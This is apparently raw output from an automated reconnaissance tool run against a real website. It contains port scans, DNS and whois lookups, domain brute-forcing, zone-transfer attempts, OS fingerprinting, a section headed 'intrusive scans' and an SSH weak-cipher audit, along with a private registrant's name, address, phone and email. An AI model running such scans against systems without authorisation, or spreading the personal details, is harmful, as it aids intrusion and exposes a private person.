- [91m + -- --=[Port 445 closed... skipping.[0m
- [91m + -- --=[Port 512 closed... skipping.[0m
- [91m + -- --=[Port 513 closed... skipping.[0m
- [91m + -- --=[Port 514 closed... skipping.[0m
- [91m + -- --=[Port 993 closed... skipping.[0m
- [91m + -- --=[Port 1433 closed... skipping.[0m
- [91m + -- --=[Port 1521 closed... skipping.[0m
- [91m + -- --=[Port 3306 closed... skipping.[0m
- [91m + -- --=[Port 3389 closed... skipping.[0m
- [91m + -- --=[Port 5432 closed... skipping.[0m
- [91m + -- --=[Port 5900 closed... skipping.[0m
- [91m + -- --=[Port 5901 closed... skipping.[0m
- [91m + -- --=[Port 8000 closed... skipping.[0m
- [91m + -- --=[Port 8080 closed... skipping.[0m
- [91m + -- --=[Port 8100 closed... skipping.[0m
- [91m + -- --=[Port 6667 closed... skipping.[0m
- #######################################################################################################################################
- Hostname candydollchan.net ISP Lucky Net Ltd (AS3254)
- Continent Europe Flag
- UA
- Country Ukraine Country Code UA (UKR)
- Region Unknown Local time 27 Oct 2017 10:24 EEST
- City Unknown Latitude 50.45
- IP Address 91.219.29.120 Longitude 30.523
- ######################################################################################################################################
- [i] Scanning Site: http://candydollchan.net
- B A S I C I N F O
- ====================
- [+] Site Title: Candydoll Downloads - Candydollchan
- [+] IP address: 91.219.29.120
- [+] Web Server: nginx/1.10.2
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow:
- Host: candydollchan.net
- Sitemap: http://candydollchan.net/sitemap.xml
- -----------[end of contents]-------------
- W H O I S L O O K U P
- ========================
- Domain Name: CANDYDOLLCHAN.NET
- Registry Domain ID: 1987658926_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.nic.ru
- Registrar URL: http://nic.ru
- Updated Date: 2016-11-28T12:47:05Z
- Creation Date: 2015-12-16T07:57:08Z
- Registry Expiry Date: 2017-12-16T07:57:08Z
- Registrar: Regional Network Information Center, JSC dba RU-CENTER
- Registrar IANA ID: 463
- Registrar Abuse Contact Email: tld-abuse@nic.ru
- Registrar Abuse Contact Phone: +7 (495) 994-46-01
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.EUROGLOBALHOST.COM
- Name Server: NS2.EUROGLOBALHOST.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2017-10-27T07:27:16Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- G E O I P L O O K U P
- =========================
- [i] IP Address: 91.219.29.120
- [i] Country: UA
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 50.450001
- [i] Longitude: 30.523300
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 200 OK
- [i] Server: nginx/1.10.2
- [i] Date: Fri, 27 Oct 2017 07:23:35 GMT
- [i] Content-Type: text/html
- [i] Connection: close
- [i] Accept-Ranges: bytes
- [i] Vary: Accept-Encoding,User-Agent
- D N S L O O K U P
- ===================
- candydollchan.net. 14379 IN A 91.219.29.120
- candydollchan.net. 14400 IN NS ns1.euroglobalhost.com.
- candydollchan.net. 14400 IN NS ns2.euroglobalhost.com.
- candydollchan.net. 14400 IN SOA ns1.euroglobalhost.com. hostmaster.candydollchan.net. 2017031402 14400 3600 1209600 86400
- candydollchan.net. 14400 IN MX 10 mail.candydollchan.net.
- candydollchan.net. 14400 IN TXT "v=spf1 a mx ip4:80.82.64.110 ~all"
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 91.219.29.120
- Network = 91.219.29.120 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 91.219.29.120 - 91.219.29.120 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-27 07:27 UTC
- Nmap scan report for candydollchan.net (91.219.29.120)
- Host is up (0.35s latency).
- rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
- PORT STATE SERVICE VERSION
- 21/tcp closed ftp
- 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
- 23/tcp closed telnet
- 25/tcp closed smtp
- 80/tcp open http nginx 1.10.2
- 110/tcp closed pop3
- 143/tcp closed imap
- 443/tcp closed https
- 445/tcp closed microsoft-ds
- 3389/tcp closed ms-wbt-server
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 11.19 seconds
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 2
- [+] Subdomain: candydollchan.net
- [-] IP: 91.219.29.120
- [+] Subdomain: mail.candydollchan.net
- [-] IP: 80.82.64.193
- R E V E R S E I P L O O K U P
- ==================================
- [i] Total Sites Found On This Server : 0
- [*] Performing TLD Brute force Enumeration against candydollchan.net
- [*] The operation could take up to: 00:01:07
- [*] A candydollchan.biz.af 5.45.75.45
- [*] CNAME candydollchan.biz.at free.biz.at
- [*] A free.biz.at 216.92.134.29
- [*] A candydollchan.co.asia 91.195.240.135
- [*] A candydollchan.org.aw 142.4.20.12
- [*] A candydollchan.com.ax 185.55.85.123
- [*] A candydollchan.org.ax 185.55.85.123
- [*] A candydollchan.co.ba 176.9.45.78
- [*] A candydollchan.com.ba 195.222.33.180
- [*] A candydollchan.com.be 95.173.170.166
- [*] A candydollchan.biz.by 71.18.52.2
- [*] A candydollchan.biz.bz 199.59.242.150
- [*] A candydollchan.net.cc 54.252.89.206
- [*] A candydollchan.com.cc 54.252.107.64
- [*] A candydollchan.co.cc 175.126.123.219
- [*] A candydollchan.org.ch 72.52.4.122
- [*] A candydollchan.co.cm 85.25.140.105
- [*] A candydollchan.net.cm 85.25.140.105
- [*] A candydollchan.biz.cl 185.53.178.8
- [*] A candydollchan.co.com 173.192.115.17
- [*] A candydollchan.com.com 52.33.196.199
- [*] A candydollchan.com 81.171.22.4
- [*] A candydollchan.net.com 199.59.242.150
- [*] A candydollchan.org.com 23.23.86.44
- [*] A candydollchan.biz.cr 72.52.4.122
- [*] CNAME candydollchan.biz.cm i.cns.cm
- [*] A i.cns.cm 118.184.56.30
- [*] A candydollchan.biz.cx 72.52.4.122
- [*] A candydollchan.biz.cz 185.53.179.7
- [*] A candydollchan.net.cz 80.250.24.177
- [*] A candydollchan.com.cz 62.109.128.30
- [*] CNAME candydollchan.co.de co.de
- [*] A co.de 144.76.162.245
- [*] A candydollchan.com.de 50.56.68.37
- [*] CNAME candydollchan.org.de www.org.de
- [*] A www.org.de 78.47.128.8
- [*] A candydollchan.net.eu 78.46.90.98
- [*] A candydollchan.org.eu 78.46.90.98
- [*] A candydollchan.biz.fi 185.55.85.123
- [*] A candydollchan.fm 173.230.131.38
- [*] A candydollchan.biz.fm 173.230.131.38
- [*] A candydollchan.org.fr 149.202.133.35
- [*] A candydollchan.biz.gl 72.52.4.122
- [*] CNAME candydollchan.co.gp co.gp
- [*] A co.gp 144.76.162.245
- [*] A candydollchan.co.hn 208.100.40.203
- [*] CNAME candydollchan.net.hr net.hr
- [*] A net.hr 192.0.78.24
- [*] A net.hr 192.0.78.25
- [*] A candydollchan.co.ht 72.52.4.122
- [*] CNAME candydollchan.biz.hn parkmydomain.vhostgo.com
- [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
- [*] A westuser.dopa.com 107.186.245.119
- [*] A candydollchan.co.jobs 50.17.193.222
- [*] A candydollchan.net.jobs 50.19.241.165
- [*] A candydollchan.com.jobs 50.19.241.165
- [*] A candydollchan.biz.jobs 50.19.241.165
- [*] A candydollchan.org.jobs 50.19.241.165
- [*] A candydollchan.la 173.230.141.80
- [*] A candydollchan.co.la 195.110.124.154
- [*] CNAME candydollchan.biz.li 712936.parkingcrew.net
- [*] A 712936.parkingcrew.net 185.53.179.29
- [*] A candydollchan.biz.lu 195.26.5.2
- [*] A candydollchan.biz.ly 64.136.20.39
- [*] A candydollchan.biz.md 72.52.4.122
- [*] A candydollchan.co.mk 87.76.31.211
- [*] A candydollchan.co.mobi 54.225.105.179
- [*] A candydollchan.biz.my 202.190.174.44
- [*] A candydollchan.net 91.219.29.120
- [*] A candydollchan.net.net 52.50.81.210
- [*] A candydollchan.co.net 188.166.216.219
- [*] A candydollchan.org.net 23.23.86.44
- [*] A candydollchan.com.nl 83.98.157.102
- [*] A candydollchan.net.nl 83.98.157.102
- [*] A candydollchan.co.nr 208.100.40.202
- [*] A candydollchan.co.nl 37.97.184.204
- [*] CNAME candydollchan.co.nu co.nu
- [*] A co.nu 144.76.162.245
- [*] A candydollchan.net.nu 199.102.76.78
- [*] CNAME candydollchan.com.nu com.nu
- [*] A com.nu 144.76.162.245
- [*] A candydollchan.org.nu 80.92.84.139
- [*] A candydollchan.org 104.18.42.230
- [*] A candydollchan.org 104.18.43.230
- [*] AAAA candydollchan.org 2400:cb00:2048:1::6812:2ae6
- [*] AAAA candydollchan.org 2400:cb00:2048:1::6812:2be6
- [*] A candydollchan.com.org 23.23.86.44
- [*] CNAME candydollchan.net.org pewtrusts.org
- [*] A pewtrusts.org 204.74.99.100
- [*] A candydollchan.ph 45.79.222.138
- [*] A candydollchan.co.ph 45.79.222.138
- [*] A candydollchan.com.ph 45.79.222.138
- [*] A candydollchan.net.ph 45.79.222.138
- [*] A candydollchan.org.ph 45.79.222.138
- [*] A candydollchan.org.pm 208.73.210.217
- [*] A candydollchan.org.pm 208.73.211.177
- [*] A candydollchan.org.pm 208.73.211.165
- [*] A candydollchan.org.pm 208.73.210.202
- [*] A candydollchan.co.pl 212.91.6.55
- [*] A candydollchan.co.ps 66.96.132.56
- [*] CNAME candydollchan.biz.ps biz.ps
- [*] A biz.ps 144.76.162.245
- [*] A candydollchan.co.pt 194.107.127.52
- [*] A candydollchan.pw 141.8.226.58
- [*] A candydollchan.co.pw 141.8.226.59
- [*] A candydollchan.net.pw 141.8.226.59
- [*] A candydollchan.biz.pw 141.8.226.59
- [*] A candydollchan.org.pw 141.8.226.59
- [*] A candydollchan.net.ro 69.64.52.127
- [*] CNAME candydollchan.co.ro now.co.ro
- [*] A now.co.ro 185.27.255.9
- [*] A candydollchan.org.re 217.70.184.38
- [*] A candydollchan.com.ru 178.210.89.119
- [*] A candydollchan.biz.sb 72.52.4.122
- [*] A candydollchan.biz.se 185.53.179.6
- [*] CNAME candydollchan.net.se 773147.parkingcrew.net
- [*] A 773147.parkingcrew.net 185.53.179.29
- [*] A candydollchan.co.sl 91.195.240.135
- [*] A candydollchan.com.sr 143.95.106.249
- [*] A candydollchan.co.su 72.52.4.122
- [*] A candydollchan.biz.st 91.121.28.115
- [*] A candydollchan.biz.tc 64.136.20.39
- [*] A candydollchan.biz.tf 85.236.153.18
- [*] A candydollchan.net.tf 188.40.117.12
- [*] A candydollchan.net.tf 188.40.70.29
- [*] A candydollchan.net.tf 188.40.70.27
- [*] A candydollchan.co.tl 208.100.40.202
- [*] A candydollchan.co.to 175.118.124.44
- [*] A candydollchan.co.tv 31.186.25.163
- [*] A candydollchan.biz.tv 72.52.4.122
- [*] A candydollchan.org.tv 72.52.4.122
- [*] CNAME candydollchan.biz.uz biz.uz
- [*] A biz.uz 144.76.162.245
- [*] A candydollchan.vg 88.198.29.97
- [*] A candydollchan.co.vg 88.198.29.97
- [*] A candydollchan.com.vg 88.198.29.97
- [*] A candydollchan.net.vg 166.62.28.147
- [*] A candydollchan.biz.vg 89.31.143.20
- [*] A candydollchan.ws 64.70.19.203
- [*] A candydollchan.com.ws 202.4.48.211
- [*] A candydollchan.net.ws 202.4.48.211
- [*] A candydollchan.biz.ws 184.168.221.104
- [*] A candydollchan.org.ws 202.4.48.211
- inetnum: 91.219.28.0 - 91.219.31.255
- netname: UKRSERVERS-NET
- country: UA
- org: ORG-FKAV1-RIPE
- admin-c: KCH78-RIPE
- tech-c: KCH78-RIPE
- status: ASSIGNED PI
- mnt-by: RIPE-NCC-END-MNT
- mnt-by: UADOMEN-MNT
- mnt-routes: UADOMEN-MNT
- mnt-routes: DATAHARBOUR-MNT
- mnt-domains: UADOMEN-MNT
- created: 2010-09-06T11:31:55Z
- last-modified: 2017-01-31T08:48:17Z
- source: RIPE
- sponsoring-org: ORG-SL452-RIPE
- organisation: ORG-FKAV1-RIPE
- org-name: FLP Kochenov Aleksej Vladislavovich
- org-type: OTHER
- address: 38, Danilevskogo Str., Kharkov
- address: Kharkov, Ukraine
- phone: +38.0443039163
- fax-no: +38.0577209170
- abuse-c: AR18187-RIPE
- admin-c: KCH78-RIPE
- tech-c: KCH78-RIPE
- mnt-ref: UADOMEN-MNT
- mnt-ref: SINARO
- abuse-mailbox: hostmaster@uadomen.com
- mnt-by: UADOMEN-MNT
- created: 2009-02-13T16:33:48Z
- last-modified: 2017-01-20T20:50:23Z
- source: RIPE # Filtered
- person: Aleksej V. Kochenov
- address: 8, Donvar Zapolskogo Str.,
- address: Kiev, Ukraine
- phone: +38.0443039163
- fax-no: +38.0577209170
- nic-hdl: KCH78-RIPE
- abuse-mailbox: support@uadomen.com
- mnt-by: UADOMEN-MNT
- created: 2009-02-13T13:13:18Z
- last-modified: 2015-05-28T18:26:23Z
- source: RIPE # Filtered
- % Information related to '91.219.29.0/24AS3254'
- route: 91.219.29.0/24
- descr: AGGREGATE BLOCK FOR LuckyNet Datacenter
- origin: AS3254
- mnt-by: AS3254-MNT
- created: 2011-03-23T09:12:24Z
- last-modified: 2011-03-23T09:12:24Z
- source: RIPE
- % This query was served by the RIPE Database Query Service version 1.90 (BLAARKOP)
- [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
- Server: 192.168.1.254
- Address: 192.168.1.254#53
- Non-authoritative answer:
- Name: candydollchan.net
- Address: 91.219.29.120
- candydollchan.net has address 91.219.29.120
- candydollchan.net mail is handled by 10 mail.candydollchan.net.
- [92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is candydollchan.net
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 91.219.29.120. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 91.219.29.120. Module test failed
- [-] No distance calculation. 91.219.29.120 appears to be dead or no ports known
- [+] Host: 91.219.29.120 is up (Guess probability: 50%)
- [+] Target: 91.219.29.120 is alive. Round-Trip Time: 0.49164 sec
- [+] Selected safe Round-Trip Time value is: 0.98327 sec
- [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
- [-] fingerprint:smb need either TCP port 139 or 445 to run
- [+] Primary guess:
- [+] Host 91.219.29.120 Running OS: (Guess probability: 100%)
- [+] Other guesses:
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- [92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
- Domain Name: CANDYDOLLCHAN.NET
- Registry Domain ID: 1987658926_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.nic.ru
- Registrar URL: http://nic.ru
- Updated Date: 2016-11-28T12:47:05Z
- Creation Date: 2015-12-16T07:57:08Z
- Registry Expiry Date: 2017-12-16T07:57:08Z
- Registrar: Regional Network Information Center, JSC dba RU-CENTER
- Registrar IANA ID: 463
- Registrar Abuse Contact Email: tld-abuse@nic.ru
- Registrar Abuse Contact Phone: +7 (495) 994-46-01
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Name Server: NS1.EUROGLOBALHOST.COM
- Name Server: NS2.EUROGLOBALHOST.COM
- Domain Name: CANDYDOLLCHAN.NET
- Registry Domain ID: 1987658926_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.nic.ru
- Registrar URL: http://www.nic.ru
- Creation Date: 2015-12-16T07:57:08Z
- Registrar Registration Expiration Date: 2017-12-15T21:00:00Z
- Registrar: Regional Network Information Center, JSC dba RU-CENTER
- Registrar IANA ID: 463
- Registrar Abuse Contact Email: tld-abuse@nic.ru
- Registrar Abuse Contact Phone: +7.4959944601
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Registry Registrant ID:
- Registrant Name: Chaplenko Yuri
- Registrant Organization: Chaplenko Yuri
- Registrant Street: Karadzhicha st. 13-35
- Registrant City: Lvov
- Registrant State/Province: Lvovskaya
- Registrant Postal Code: 79054
- Registrant Country: UA
- Registrant Phone: +380.672306256
- Registrant Phone Ext:
- Registrant Email: ychaplenko@inbox.ru
- Registry Admin ID:
- Admin Name: Chaplenko Yuri
- Admin Organization: Chaplenko Yuri
- Admin Street: Karadzhicha st. 13-35
- Admin City: Lvov
- Admin State/Province: Lvovskaya
- Admin Postal Code: 79054
- Admin Country: UA
- Admin Phone: +380.672306256
- Admin Phone Ext:
- Admin Email: ychaplenko@inbox.ru
- Registry Tech ID:
- Tech Name: Chaplenko Yuri
- Tech Organization: Chaplenko Yuri
- Tech Street: Karadzhicha st. 13-35
- Tech City: Lvov
- Tech State/Province: Lvovskaya
- Tech Postal Code: 79054
- Tech Country: UA
- Tech Phone: +380.672306256
- Tech Phone Ext:
- Tech Email: ychaplenko@inbox.ru
- Name Server: ns1.euroglobalhost.com
- Name Server: ns2.euroglobalhost.com
- DNSSEC: unsigned
- URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
- For more information on Whois status codes, please visit: https://icann.org/epp
- >>> Last update of WHOIS database: 2017.10.27T07:26:29Z <<<
- [92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 91.219.29.120:www.candydollchan.net
- [92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x candydollchan.net
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26499
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;net.candydollchan.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102402 1800 900 604800 3600
- ;; Query time: 38 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Fri Oct 27 03:26:53 EDT 2017
- ;; MSG SIZE rcvd: 127
- dnsenum VERSION:1.2.4
- [1;34m
- ----- candydollchan.net -----
- [0m[1;31m
- Host's addresses:
- __________________
- [0mcandydollchan.net. 14203 IN A 91.219.29.120
- [1;31m
- Name Servers:
- ______________
- [0m[1;31m
- Mail (MX) Servers:
- ___________________
- [0mmail.candydollchan.net. 14400 IN A 80.82.64.193
- [1;31m
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- [0m
- Trying Zone Transfer for candydollchan.net on ns2.euroglobalhost.com ...
- Trying Zone Transfer for candydollchan.net on ns1.euroglobalhost.com ...
- brute force file not specified, bay.
- [92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
- [91m
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [94m[-] Enumerating subdomains now for candydollchan.net[0m
- [93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
- [92m[-] Searching now in Baidu..[0m
- [92m[-] Searching now in Yahoo..[0m
- [92m[-] Searching now in Google..[0m
- [92m[-] Searching now in Bing..[0m
- [92m[-] Searching now in Ask..[0m
- [92m[-] Searching now in Netcraft..[0m
- [92m[-] Searching now in DNSdumpster..[0m
- [92m[-] Searching now in Virustotal..[0m
- [92m[-] Searching now in ThreatCrowd..[0m
- [92m[-] Searching now in SSL Certificates..[0m
- [92m[-] Searching now in PassiveDNS..[0m
- [91mVirustotal: [0mmail.candydollchan.net
- [91mVirustotal: [0mwww.candydollchan.net
- [91mDNSdumpster: [0mmail.candydollchan.net
- [93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-candydollchan.net.txt[0m
- [93m[-] Total Unique Subdomains Found: 2[0m
- [92mwww.candydollchan.net[0m
- [92mmail.candydollchan.net[0m
- [91m ââââŠââââŠââââ⊠âŠ[0m
- [91m â â âŠâ â ââââ ââ£[0m
- [91m ââââ©ââ â©oââââ© â©[0m
- [91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
- [94m
- [91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-candydollchan.net-full.txt
- [0m
- [92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
- [92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
- [92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
- PING candydollchan.net (91.219.29.120) 56(84) bytes of data.
- 64 bytes from 120.29.219.91.colo.ukrservers.com (91.219.29.120): icmp_seq=1 ttl=54 time=151 ms
- --- candydollchan.net ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 151.189/151.189/151.189/0.000 ms
- [92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 03:27 EDT
- Nmap scan report for candydollchan.net (91.219.29.120)
- Host is up (0.27s latency).
- rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
- Not shown: 34 closed ports, 13 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- Nmap done: 1 IP address (1 host up) scanned in 2.81 seconds
- [92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
- [91m + -- --=[Port 21 closed... skipping.[0m
- [93m + -- --=[Port 22 opened... running tests...[0m
- # general
- (gen) banner: SSH-2.0-OpenSSH_6.6.1
- (gen) software: OpenSSH 6.6.1
- (gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-ripemd160-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
